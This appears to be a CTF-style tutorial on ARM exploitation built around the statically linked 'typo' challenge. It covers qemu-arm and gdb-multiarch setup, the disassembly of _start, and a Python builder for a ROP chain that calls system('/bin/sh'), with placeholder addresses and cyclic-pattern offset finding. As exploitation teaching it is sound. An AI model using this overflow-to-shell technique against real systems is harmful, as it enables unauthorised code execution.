ARM architecture exploitation

ARM architecture vulnerability exploitation

Environment setup

```shell
sudo apt-get install gdb-multiarch
# install qemu (the user-mode emulator that provides qemu-arm is in the qemu-user package)
apt search "libc6" | grep ARCH   # find the cross libc for the target, e.g. libc6-armhf-cross
```

The typo challenge

The binary is statically linked, so its symbol table has to be recovered before analysis; see the article on static symbol table recovery.

Starting the program under qemu

```shell
qemu-arm -g 1234 ./typo
# -g makes qemu wait for a gdb connection on port 1234 before executing the first instruction.
# This challenge is statically linked, so no -L is needed; a dynamically linked program needs
# -L pointing at the target sysroot, e.g. -L /usr/arm-linux-gnueabihf/ for ARM
# (the MIPS equivalent would be -L /usr/mipsel-linux-gnu/).
gdb-multiarch ./typo -q
(gdb) target remote localhost:1234
```
After connecting, gdb stops at the entry point. This is _start: it zeroes fp and lr, pops argc into r1, takes argv from sp, and sets up the call to __libc_start_main at 0x9ebc:

```
 ► 0x8b98    mov    fp, #0
   0x8b9c    mov    lr, #0
   0x8ba0    pop    {r1}
   0x8ba4    mov    r2, sp
   0x8ba8    str    r2, [sp, #-4]!
   0x8bac    str    r0, [sp, #-4]!
   0x8bb0    ldr    ip, [pc, #0x10]
   0x8bb4    str    ip, [sp, #-4]!
   0x8bb8    ldr    r0, [pc, #0xc]
   0x8bbc    ldr    r3, [pc, #0xc]
   0x8bc0    bl     #0x9ebc
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ sp 0xf6fff1a0 ◂— 0x1
01:0004│    0xf6fff1a4 —▸ 0xf6fff334 ◂— './typo'
02:0008│    0xf6fff1a8 ◂— 0x0
03:000c│    0xf6fff1ac —▸ 0xf6fff33b ◂— 0x752f3d5f ('_=/u')
04:0010│    0xf6fff1b0 —▸ 0xf6fff34f ◂— 0x54554158 ('XAUT')
05:0014│    0xf6fff1b4 —▸ 0xf6fff372 ◂— 0x5353454c ('LESS')
06:0018│    0xf6fff1b8 —▸ 0xf6fff394 ◂— 0x5f4b5447 ('GTK_')
07:001c│    0xf6fff1bc —▸ 0xf6fff3a7 ◂— 0x5f474458 ('XDG_')
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0 8b98
```
The same code in IDA. The function loaded into R0 (sub_8F00) is main, sub_9EBC is __libc_start_main, and sub_F0E0 is the abort that follows it:

```
.text:00008B9C MOV LR, #0
.text:00008BA0 LDR R1, [SP+arg_0],#4
.text:00008BA4 MOV R2, SP
.text:00008BA8 STR R2, [SP,#-4+arg_0]!
.text:00008BAC STR R0, [SP,#var_4]!
.text:00008BB0 LDR R12, =__libc_thread_freeres
.text:00008BB4 STR R12, [SP,#4+var_8]!
.text:00008BB8 LDR R0, =sub_8F00    // this function is main
.text:00008BBC LDR R3, =sub_A5EC
.text:00008BC0 BL sub_9EBC
.text:00008BC4 BL sub_F0E0
```

Under the ARM calling convention (AAPCS) the first four integer arguments are passed in r0 to r3, not on the stack, so the chain only has to load the address of a "/bin/sh" string into r0 and then jump to system. Because the binary is statically linked, system and a suitable gadget such as `pop {r0, pc}` live inside ./typo itself and can be located with a gadget finder (for example ROPgadget --binary ./typo). One ARM-specific caveat: a return address with bit 0 set is executed as Thumb code, so the gadget address in the chain must match the mode (ARM or Thumb) the gadget was assembled in.
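The chain described above as a pure-Python payload builder, together with the cyclic-pattern offset search that precedes it. This is an added example, not code from the original write-up; the padding length and every address in it are hypothetical placeholders, and in a real run they come from the crash under gdb-multiarch, the recovered symbol table and a gadget finder.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

# Hypothetical values (assumptions, not taken from the page): in a real run the padding
# comes from cyclic_find() on the crash seen under gdb-multiarch, and the addresses from
# the recovered symbol table plus a gadget finder such as ROPgadget.
PADDING_LEN = 112          # bytes from the overflowed buffer to the saved lr
POP_R0_PC   = 0x00020904   # gadget: pop {r0, pc}   (ARM-mode address)
BINSH_STR   = 0x0006c384   # "/bin/sh" string inside the static binary
SYSTEM      = 0x00010b5c   # system()


def p32(value):
    """Pack one 32-bit little-endian word, the form qemu-arm (AArch32 LE) pops from the stack."""
    return struct.pack("<I", value & 0xffffffff)


_DB_CACHE = {}

def de_bruijn(alphabet=ALPHABET, n=4):
    """De Bruijn sequence over alphabet in which every n-byte window is unique (cached)."""
    key = (alphabet, n)
    if key not in _DB_CACHE:
        k = len(alphabet)
        a = [0] * k * n
        seq = []

        def db(t, p):
            if t > n:
                if n % p == 0:
                    seq.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)

        db(1, 1)
        _DB_CACHE[key] = bytes(alphabet[i] for i in seq)
    return _DB_CACHE[key]


def cyclic(length):
    """First `length` bytes of the pattern: feed this to the program to crash it."""
    return de_bruijn()[:length]


def cyclic_find(value):
    """Offset of the 4-byte window found in a crashed register (pc or lr), or -1.

    AArch32 never shows bit 0 of pc (it only selects Thumb state), so when the raw
    value is not in the pattern the variant with bit 0 set is tried as well.
    """
    pattern = de_bruijn()
    for candidate in (value, value | 1):
        idx = pattern.find(p32(candidate))
        if idx != -1:
            return idx
    return -1


def build_payload(padding_len, pop_r0_pc, binsh, system, thumb_gadget=False):
    """Padding followed by the chain, in the order the words are popped:

        saved lr  <- pop_r0_pc : becomes pc when the vulnerable function returns
        next word <- binsh     : popped into r0, the first argument of system()
        next word <- system    : popped into pc, so system("/bin/sh") runs

    Bit 0 of the gadget address is set only for a Thumb gadget (interworking).
    """
    gadget = (pop_r0_pc | 1) if thumb_gadget else (pop_r0_pc & ~1)
    return b"A" * padding_len + p32(gadget) + p32(binsh) + p32(system)


def bad_bytes(payload, forbidden=b"\n\x00"):
    """Set of forbidden byte values present in payload; empty means the payload survives
    an input routine that stops at newline or NUL."""
    return {b for b in forbidden if b in payload}


if __name__ == "__main__":
    payload = build_payload(PADDING_LEN, POP_R0_PC, BINSH_STR, SYSTEM)
    with open("payload", "wb") as f:
        f.write(payload)
    print(f"wrote {len(payload)} bytes; bad bytes: {bad_bytes(payload) or 'none'}")
```

Workflow: send `cyclic(200)` to the program under qemu-arm, read the value in pc (or lr) from the pwndbg crash view, pass it to `cyclic_find()` to get the padding length, then write the payload file and feed it to the program. With the placeholder addresses above `bad_bytes()` reports a NUL, because every address in a 32-bit binary loaded below 0x01000000 has a zero top byte; that is harmless for a read()-style overflow but truncates a strcpy-style one, so run the check before deciding how the chain has to be delivered.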